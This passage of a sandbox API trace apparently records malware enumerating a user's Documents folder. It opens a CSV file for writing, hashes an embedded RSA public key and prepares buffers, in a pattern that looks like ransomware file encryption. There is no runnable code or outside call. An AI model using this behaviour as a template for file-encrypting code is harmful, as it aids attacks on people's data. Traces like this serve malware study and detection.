(HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41a88 | out: hHeap=0x6a0000) returned 1 [0192.358] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.358] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.359] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.359] PathFindFileNameW (pszPath="") returned="" [0192.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.359] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\rqz y4w0rybhq_irzd3\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb2181920, ftCreationTime.dwHighDateTime=0x1d8a59a, ftLastAccessTime.dwLowDateTime=0x189d1bd0, ftLastAccessTime.dwHighDateTime=0x1d8a5b6, ftLastWriteTime.dwLowDateTime=0x189d1bd0, ftLastWriteTime.dwHighDateTime=0x1d8a5b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0192.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.362] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb2181920, ftCreationTime.dwHighDateTime=0x1d8a59a, ftLastAccessTime.dwLowDateTime=0x189d1bd0, ftLastAccessTime.dwHighDateTime=0x1d8a5b6, ftLastWriteTime.dwLowDateTime=0x189d1bd0, ftLastWriteTime.dwHighDateTime=0x1d8a5b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.362] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa35eff30, ftCreationTime.dwHighDateTime=0x1d8a01c, ftLastAccessTime.dwLowDateTime=0x6f5b8b90, ftLastAccessTime.dwHighDateTime=0x1d8a58a, ftLastWriteTime.dwLowDateTime=0x6f5b8b90, ftLastWriteTime.dwHighDateTime=0x1d8a58a, nFileSizeHigh=0x0, nFileSizeLow=0x7f49, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f4quftb6AeNpM.csv", cAlternateFileName="F4QUFT~1.CSV")) returned 1 [0192.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0192.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.362] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\f4quftb6AeNpM.csv") returned=".csv" [0192.362] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\f4quftb6AeNpM.csv" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\rqz y4w0rybhq_irzd3\\f4quftb6aenpm.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.363] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=32585) returned 1 [0192.363] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.366] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7f23, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.366] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.369] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.369] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x7f49, lpOverlapped=0x0) returned 1 [0192.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.370] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea810) returned 1 [0192.371] CryptCreateHash (in: hProv=0x6ea810, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.371] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.371] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.371] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.371] GetLastError () returned 0x0 [0192.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.372] GetLastError () returned 0x0 [0192.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.372] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.372] CryptReleaseContext (hProv=0x6ea810, dwFlags=0x0) returned 1 [0192.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.372] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.372] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0192.373] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7f50) returned 0x2d45778 [0192.373] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41a88 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41ad0 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.374] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0192.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d30 [0192.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39d18 [0192.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0192.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0192.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0192.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.377] GetCurrentThreadId () returned 0x264 [0192.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d450e0 [0192.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0192.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.378] GetCurrentThreadId () returned 0x264 [0192.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d30 [0192.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d90 [0192.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0192.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39da8 [0192.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d48 [0192.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0192.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d18 [0192.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0192.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41ad0 | out: hHeap=0x6a0000) returned 1 [0192.387] 